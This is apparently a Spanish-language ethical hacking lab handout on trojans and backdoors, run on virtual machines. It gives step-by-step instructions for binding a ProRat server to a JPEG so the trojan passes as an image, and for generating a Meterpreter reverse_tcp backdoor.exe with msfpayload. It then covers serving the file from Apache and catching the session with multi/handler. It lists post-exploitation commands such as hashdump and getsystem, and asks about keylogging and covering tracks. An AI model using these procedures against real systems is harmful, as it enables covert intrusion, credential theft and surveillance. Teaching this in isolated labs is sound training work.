Práctica 06 - Trojanos y Backdoors

Práctica de Hacking Ético

Trojanos y Backdoors

Objetivo: Observar el funcionamiento y la forma de distribución de software malicioso.

Requisitos:

• Máquina Virtual llamada STIT-WinXP (usuario: administrador; contraseña: user) • Máquina Virtual llamada STIT-Win2K3 (usuario: administrador; contraseña: user) • Máquina Virtual llamada BT5-STIT (usuario: root; contraseña: toor)

Usuario adicional Windows: Usuario: prueba1; Contraseña: QAZ123wsx456

1. Instalación de ProRat: ProRat es una herramienta bastante completa que siempre que se logre distribuir y se mantenga activa en la máquina víctima, permitirá tener acceso y controlar dispositivos. En el escritorio de la máquina STIT-WinXP, entre en la carpeta ProRat y ejecute el archivo ProRat.exe

Seleccione Create > Create ProRat Server (342 Kbayt) para configurar la aplicación

En la ventana de creación del servidor, haga clic en General Settings y ajuste los parámetros según desee. Puede dejar los valores de Server Port, Server Password y VictimName por defecto. Luego asegúrese de deshabilitar las opciones mostradas en la imagen:

Seleccione la opción Bind with File. Luego, habilite la opción Bind server with a file, haga clic en Select File y búsque un archivo llamado Hermoso.jpg ubicado en el escritorio. Se desplegará un mensaje indicando que el servidor fue enlazado con el archivo seleccionado. Haga clic en OK.

Vaya a la opción Server Extensions y asegúrese de que la opción EXE (Has icon support) esté seleccionada

Ahora, haga clic en Server Icon y seleccione el icono de su preferencia y haga clic en Create Server. Luego de unos instantes recibirá un mensaje indicando que el servidor fue creado y que fue alojado en el directorio desde donde se ejecutó el ProRat.

Distribuya el archivo creado hacia la máquina STIT-Win2K3. Puede utilizar las carpetas compartidas que existen en el servidor. Desde la máquina STIT-WinXP vaya a Start > Run y ejecute \\192.168.37.2 En caso de que solicite credenciales puede utilizar: Usuario: stit-test.com\administrador Contraseña: user Luego coloque el archivo generado anteriormente en la carpeta llamada Compartida Desde el escritorio de la máquina virtual STIT-Win2K3, entre en la carpeta llamada Compartida y haga doble clic en el archivo generado. Se desplegará la imagen. Deje la imagen abierta y vuelva a la máquina STIT-WinXP. En la ventana del ProRat, especifique la dirección IP del servidor STIT-Win2K3 (192.168.37.2) haga clic en Connect y se le solicitará una contraseña (que si dejó los valores por defecto será 123456)

Verifique que la conexión fue exitosa observando el mensaje en la esquina inferior izquiera de la ventana del ProRat

Una vez conectado, haga clic en PC Info en el menú de la izquierda y luego en System Information para visualizar información de la máquina.

Explore libremente otras opciones del menú ProRat tales como Applications, Services, File Manager y Funny Stuff

2. Creación de Trojano™ con Metasploit: En esta sección se creará un software malicioso empleando un payload de Metasploit, que al ejecutarse en una máquina Windows, creará una conexión hacia la máquina del atacante.

Para crear el programa malicioso inicie la máquina BT5-STIT. Asegúrese de que la dirección IP de la máquina es 192.168.37.50. Puede verificarlo con el comando ifconfig En caso de que la dirección IP no sea la especificada, utilice el siguiente comendo para configurarla: ifconfig eth0 192.168.37.50 netmask 255.255.255.0 Una vez los parámetros de red estén configurados, abra una ventana de terminal y ejecute el comando msfconsole y espere unos segundos a que la consola de Metasploit cargue por completo.

Luego, ejecute el siguiente comendo: msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.37.50 X > Desktop/backdoor.exe (Todo el comando el comando va en una sola línea. Luego de la dirección IP hay un espacio y luego la letra “X” en mayúscula)

Ahora, se habilitará un servidor apache en la máquina BT5-STIT para distribuir el software malicioso. Des un terminal, cree un directorio utilizando el comando: mkdir /var/www/share

Cambie los permisos del directorio creado con el siguiente comando: chmod –R 755 /var/www/share

Cambie el ownership de este directorio a www-data ejecutando: chown –R www-data:www-data /var/www/share

Verifique que los cambios se han aplicado ejecutando: ls –la /var/www/ | grep share

Inicie el servidor apache con el siguiente comando: service apache2 start

Copie el programa malicioso en el directorio creado con el comando: cp /root/Desktop/backdoor.exe /var/www/share

Inicie el manejador de sesiones de Metasploit, que será el encargado de recibir la conexión de la máquina víctima al ejecutar el software malicioso. Esto se logra ejecutando el siguiente procedimiento desde la consola de Metasploit: Cargue el handler ejecutando: use exploit/multi/handler

Cargue el payload correspondiente ejecutando: set payload windows/meterpreter/reverse_tcp

Configure el payload cargado anteriormente con la dirección IP de la máquina del atacante, esto se logra ejecutando: set lhost 192.168.37.50

Verifique que la configuración está correcta ejecutando: show options

Active el manejador de sesiones (handler) ejecutando: exploit –j -z

Desde la máquina STIT-Win2K3, abra un navegador y entre en el siguiente URL: http://192.168.37.50/share

Descargue el archivo backdoor.exe y ejecútelo. Es posible que deba agregar el URL a la lista de sitios permitidos del Internet Explorer. Desde la máquina BT5-STIT, verifique que el manejador de sesiones de Metasploit recibió la conexión.

Interactúe con esta sesión con el comando: sessions –i <N° de sesión> donde N° de sesión dependerá de la cantidad de sesiones detectadas por el manejador

Ejecute el comando help y observe la lista de comandos de meterpreter disponibles. Explore multiples opciones tales como:

• Idletime • Hashdump • Getsystem • Sysinfo

Responda las siguientes preguntas:

¿Es posible utilizar el meterpreter como un Keylogger? ¿Cómo se configuraría o se activaría?

¿Es posible cubrir huellas con el meterpreter?

Fin del Laboratorio